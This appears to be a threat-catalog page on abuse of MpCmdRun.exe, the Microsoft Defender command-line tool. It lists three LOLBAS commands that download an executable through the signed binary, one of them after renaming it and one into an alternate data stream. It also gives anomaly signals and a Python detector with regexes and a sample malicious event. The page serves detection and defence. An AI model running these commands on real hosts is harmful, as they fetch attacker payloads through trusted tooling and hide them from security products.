Process

unknown

mpcmdrun.exe

MpCmdRun.exe is the command-line interface to Microsoft Defender Antivirus, used to run scans, manage signatures, and configure protection. Administrators use it to drive Defender from scripts. Attackers abuse it to download files through a trusted binary and to turn protection off.

File identity

File details

Not observed.

Signing information

Not observed.

File version

Not observed.

File size

Not observed.

Execution context

File paths

Not observed.

User context

Not observed.

Integrity level

Not observed.

Instances

Not observed.

Session

Not observed.

Token privileges

Not observed.

Ancestry

Parents

Not observed.

Children

Not observed.

Grandparents

Not observed.

Grandchildren

Not observed.

Behavior

Loaded modules

Not observed.

Named pipes

Not observed.

Process handles

Not observed.

Command-line patterns

Not observed.

LOLBAS
  • MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe} (Download · Download file)
  • copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url {REMOTEURL:.exe} -path C:\Users\Public\Downloads\evil.exe (Download · Download file)
  • MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}:evil.exe (ADS · Hide downloaded data into an Alternate Data Stream)

Indicators

Hashes

Not observed.

Analysis

About this process

MpCmdRun.exe (Microsoft Malware Protection Command Line Utility) controls Microsoft Defender Antivirus. It can start scans, update or roll back signatures, collect diagnostics, and restore quarantined items. Because Defender updates itself into versioned platform folders, the genuine binary lives under C:\ProgramData\Microsoft\Windows Defender\Platform\<version>\MpCmdRun.exe (and a copy under Program Files\Windows Defender), not in System32.

Legitimately, MpCmdRun is run by administrators and by Defender's own tooling. The action it performs is what gives an instance meaning, and a couple of those actions are useful to attackers.

Security notes

MpCmdRun.exe is a download proxy (T1105). Its -DownloadFile option fetches a file from a URL to a local path, so an attacker can use Defender's own signed tool to pull tooling onto the host under a name that security products are unlikely to flag. Watch for an MpCmdRun command line containing -DownloadFile and a URL, especially from an unusual parent.

It is also used to weaken Defender (T1685). MpCmdRun and the related configuration commands can remove signatures, disable scanning features, or restore quarantined files, blinding the very product it belongs to. Because the tool is legitimate, the action and the parent are what separate Defender administration from an attacker downloading payloads or switching protection off.

Anomaly signals
  • Image path outside the Windows Defender Platform or Program Files locations (high)
  • -DownloadFile fetching a file from a URL (high)
  • Parent is an Office application, a script host, cmd.exe, or powershell.exe (high)
  • Commands that disable scanning or remove definitions (high)
  • Outbound connections to hosts unrelated to Defender updates (med)
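The security notes and the anomaly signals above can be turned into one scoring pass over process-creation events. The following is an added example written for this page, not code from the catalog; the event shape (modelled on Sysmon event ID 1, including OriginalFileName so a renamed copy is still recognised), the list of suspicious parent images, the regexes and the sample events are all assumptions constructed here.

```python
import re
from dataclasses import dataclass

# Folders where a genuine MpCmdRun.exe lives (see "About this process").
EXPECTED_IMAGE_DIRS = (r"c:\programdata\microsoft\windows defender\platform",
                       r"c:\program files\windows defender")
# Parents named in the anomaly signals (assumed set of Office and script-host images).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "wscript.exe",
                      "cscript.exe", "mshta.exe", "cmd.exe", "powershell.exe"}
DOWNLOAD_RE = re.compile(r"-downloadfile\b.*-url\s+\S+", re.I)
ADS_RE = re.compile(r"-path\s+\S+\.\w+:\S+", re.I)               # destination carries an ADS
TAMPER_RE = re.compile(r"-(removedefinitions|restore)\b", re.I)  # signature removal / unquarantine

@dataclass
class ProcEvent:                 # assumed event shape, modelled on Sysmon event ID 1
    image: str                   # full path of the new process
    command_line: str
    parent_image: str            # full path of the parent
    original_file_name: str      # PE OriginalFileName, which survives a rename of the binary

def score_event(ev: ProcEvent) -> list[tuple[str, str]]:
    """Return (signal, severity) pairs for one process-creation event."""
    image = ev.image.lower()
    if "mpcmdrun.exe" not in {image.rsplit("\\", 1)[-1], ev.original_file_name.lower()}:
        return []
    hits = []
    if not any(image.startswith(d + "\\") for d in EXPECTED_IMAGE_DIRS):
        hits.append(("image path outside Defender Platform/Program Files", "high"))
    if DOWNLOAD_RE.search(ev.command_line):
        hits.append(("-DownloadFile fetching a file from a URL", "high"))
        if ADS_RE.search(ev.command_line):
            hits.append(("download written into an alternate data stream", "high"))
    if ev.parent_image.lower().rsplit("\\", 1)[-1] in SUSPICIOUS_PARENTS:
        hits.append(("parent is Office, a script host, cmd.exe or powershell.exe", "high"))
    if TAMPER_RE.search(ev.command_line):
        hits.append(("command removes definitions or restores quarantined files", "high"))
    return hits

def is_alert(ev: ProcEvent) -> bool:
    return any(sev == "high" for _, sev in score_event(ev))

# Constructed sample events, not real telemetry.
PLATFORM = r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0"
BENIGN_SCAN = ProcEvent(PLATFORM + r"\MpCmdRun.exe", "MpCmdRun.exe -Scan -ScanType 1",
                        r"C:\Windows\System32\svchost.exe", "MpCmdRun.exe")
RENAMED_DOWNLOAD = ProcEvent(
    r"C:\Users\Public\Downloads\MP.exe",
    r'"C:\Users\Public\Downloads\MP.exe" -DownloadFile -url http://example.invalid/t.exe '
    r"-path C:\Users\Public\Downloads\t.exe:evil.exe",
    r"C:\Windows\System32\cmd.exe", "MpCmdRun.exe")
```

Feed each process-creation event to score_event; the renamed copy in Downloads is still caught through OriginalFileName, while a scheduled scan from the platform folder produces no signal.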

Telemetry

OS prevalence

Not observed.

Observation timeline

Not observed.

References
